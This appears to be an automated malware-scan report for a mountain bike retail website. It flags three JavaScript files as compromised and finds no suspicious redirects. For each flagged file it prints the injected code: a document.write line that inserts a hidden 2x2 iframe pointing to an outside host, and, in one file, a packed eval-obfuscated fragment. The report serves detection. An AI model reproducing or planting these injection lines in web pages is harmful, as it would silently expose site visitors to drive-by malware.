Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nextmountainbike.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://nextmountainbike.com/ | 200 OK Content-Length: 7748 Content-Type: text/html | clean |
http://nextmountainbike.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72345 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohpn.html?j=1415336></iframe>');
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}funct e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohpn.html?j=1415336 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohpn.html?j=1415336> | ||
http://nextmountainbike.com/js/sidebar_adjust.js?id=20130129092925 | 200 OK Content-Length: 1253 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohpn.html?j=1415336></iframe>');
if (typeof jQuery != 'undefined') { $( function() { setTimeout("adjustSidebarHeight()", 200); } ); } function adjustSidebarHeight(height) { var sidebarHeight = 0; var contentHeight = 0; var contentName = ""; sidebarHeight = $("#Sidebar").height(); contentHeight = height == undefined ? $("#" + contentName).height() : height; if (sidebarHeight > contentHeight) { $("#Main-Content").height(sidebarHeight - offSet); } else { $("#Sidebar").height(contentHeight + offSet); } } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohpn.html?j=1415336 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohpn.html?j=1415336> | ||
http://nextmountainbike.com/js/jquery.browser.min.js?id=20130129092925 | 200 OK Content-Length: 2922 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohpn.html?j=1415336></iframe>');
if (typeof jQuery != 'undefined') { eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(c/a))+String.fromCharCode(c%a+161)};while(c--){if(k[c]){p=p.replace(new RegExp(e(c),'g'),k[c])}}return p}('à ¡(){® Ã={\'Â¥\':¡(){¢ £.Â¥},\'©\':{\'±\':¡(){¢ £.©.±},\'¯\':¡(){¢ £.©. } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohpn.html?j=1415336 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohpn.html?j=1415336> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://nextmountainbike.com/downhill_mountain_bikes.html | 200 OK Content-Length: 7800 Content-Type: text/html | clean |
http://nextmountainbike.com/diamondback_mountain_bikes.html | 200 OK Content-Length: 7938 Content-Type: text/html | clean |
http://nextmountainbike.com/k2_mountain_bikes.html | 200 OK Content-Length: 7633 Content-Type: text/html | clean |
http://nextmountainbike.com/about_us.html | 200 OK Content-Length: 4207 Content-Type: text/html | clean |
http://nextmountainbike.com/contact_us.html | 200 OK Content-Length: 5002 Content-Type: text/html | clean |
http://nextmountainbike.com/privacy_policy.html | 200 OK Content-Length: 4936 Content-Type: text/html | clean |
http://nextmountainbike.com/site_map.html | 200 OK Content-Length: 4119 Content-Type: text/html | clean |
http://nextmountainbike.com/test404page.js | 500 Internal Server Error Content-Length: 759 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nextmountainbike.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 22:01:53 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 7748
Content-Type: text/html
Last-Modified: Tue, 29 Jan 2013 14:29:30 GMT
...7748 bytes of data.
GET / HTTP/1.1
Host: nextmountainbike.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 22:01:53 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 7748
Content-Type: text/html
Last-Modified: Tue, 29 Jan 2013 14:29:30 GMT
...7748 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nextmountainbike.com
Referer: http://www.google.com/search?q=nextmountainbike.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nextmountainbike.com
Referer: http://www.google.com/search?q=nextmountainbike.com
Result:
The result is similar to the first query. There are no suspicious redirects found.